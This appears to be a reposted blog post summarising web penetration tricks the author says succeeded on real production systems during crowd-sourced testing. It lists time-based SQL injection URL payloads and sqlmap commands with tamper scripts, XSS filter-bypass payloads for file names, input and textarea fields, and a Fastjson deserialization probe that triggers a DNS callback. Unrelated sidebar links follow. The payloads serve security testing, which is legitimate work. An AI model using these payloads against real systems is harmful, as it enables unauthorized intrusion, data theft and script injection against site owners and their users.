当前位置:网站首页>Web penetration experience summary ing
Web penetration experience summary ing
2022-07-24 18:14:00 【haoaaao】
Preface
// Record the successful small in the real system tips, After all, there is still a big difference between the shooting range and the production environment ,** It is better to travel ten thousand miles than to read ten thousand books **//
0x00、SQL
A crowd test actual battle sql Injection bypass SQL Injection means web The application does not judge or filter the validity of the user's input data , Attackers can web Add extra... At the end of a predefined query statement in the application SQL sentence , Implement illegal operation without the administrator's knowledge , To achieve ——ZAKER, Personalized recommendation of popular news , Local authoritative media information
http://app.myzaker.com/news/article.php?pk=6035b5af8e9f09165c74a1ccmysql rlike concat_ Time blind subquery and rlike_ Crazy Liu Laoshi's blog -CSDN Blog sql Injection first try single quotation marks ; When the single quotation mark does not report an error , Try wide byte Injection %df'(--tamper=unmagicquotes)1、 Time blind subquery (SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike Error when using regular matching , Use REGEXP and NOTREGEXP The operator ( or RLIKE and NOTR...https://blog.csdn.net/weixin_29611737/article/details/113910368
One 、 Those successful closures in the system
️http://ip/api/user/query?atSchoolStatus=¤t_page=1&department=01'and(select*from(select+sleep(5))a+union+select+1)='&email=212&enabledStatus=&idCardNumber=&idCardType=
Two 、 Those successful in the system sqlmap sentence
//sql Now I have to doubt myself
python sqlmap.py -r 1.txt --time-sec 8 --tamper=space2mysqlblank.py --batch --level 3 -p canshusqlmap -r xxx.txt --tamper=space2comment --level 3 --batch0x01、XSS
Those successful bypass gestures in the system
1、 File attachment
//ps: Front end validation
️<img src=x οnerrοr=confirm(1)>.jpg
2、input label
️”><img src=1 οnerrοr=alert(1)>
3、textarea label
️unicode Code bypass :
</textarea><img src="x" οnerrοr="alert("xss");">
️
Bypass pose summary
0x02、 Deserialization
1、Fastjson
// Found in the sending packet fastjson frame , Try .
step :
(1) Go to https://dig.pm/ Last application dns.

(2)payload:{ {"@type":"java.net.URL","val":"http://dns"}:"summer"}, Replace payload Inside dns, Click on post Contract awarding .
(3) open dig Website “results”, There are loopholes ,results There will be echo .
边栏推荐
- 字符串常用方法(2)
- Growth of operation and maintenance Xiaobai - week 8 of Architecture
- Flatten array.Flat (infinity)
- Section 7 Data Dictionary: hash followed by Daewoo redis ------- directory post
- 获取1688app上原数据 API
- Example of single table query in ORM student management system
- PXE高效批量网络装机
- 数组扁平化.flat(Infinity)
- 猜JWT关键字
- Is header file required? Follow the compilation process~~~
猜你喜欢

Inherit, override, overload

Pycharm configuring opencv Library

Inheritance and Derive

0625~<config>-<bus>

PXE efficient batch network installation

T245982 「KDOI-01」醉花阴

Go language interface and type

0630~ professional quality course

Interview assault 66: what is the difference between request forwarding and request redirection?

Definition and storage of adjacency table and adjacency storage of directed graph and undirected graph
随机推荐
0627~ holiday knowledge summary
05mysql lock analysis
File upload vulnerability -.User.ini and.Htaccess
Use prometheus+grafana to monitor MySQL performance indicators
About the writing method of interface 1 chain interpretation 2. Method execution (finally) must be executed
Common methods of number and math classes
运维小白成长记——架构第8周
0701~ holiday summary
Interview assault 66: what is the difference between request forwarding and request redirection?
Shanghai Jiaotong University team used joint deep learning to optimize metabonomics research
Polymorphism, abstract class, interface
还在从零开始搭建项目?这款升级版快速开发脚手架值得一试!
Pycharm configuring opencv Library
T245982 "kdoi-01" drunken flower Yin
如何用WebGPU流畅渲染百万级2D物体?
Bib | mol2context vec: context aware deep network model learning molecular representation for drug discovery
JS array method sort() collation parsing
Array object methods commonly used traversal methods & higher-order functions
Alibaba 1688 keyword search product API usage display
0630~职业素养课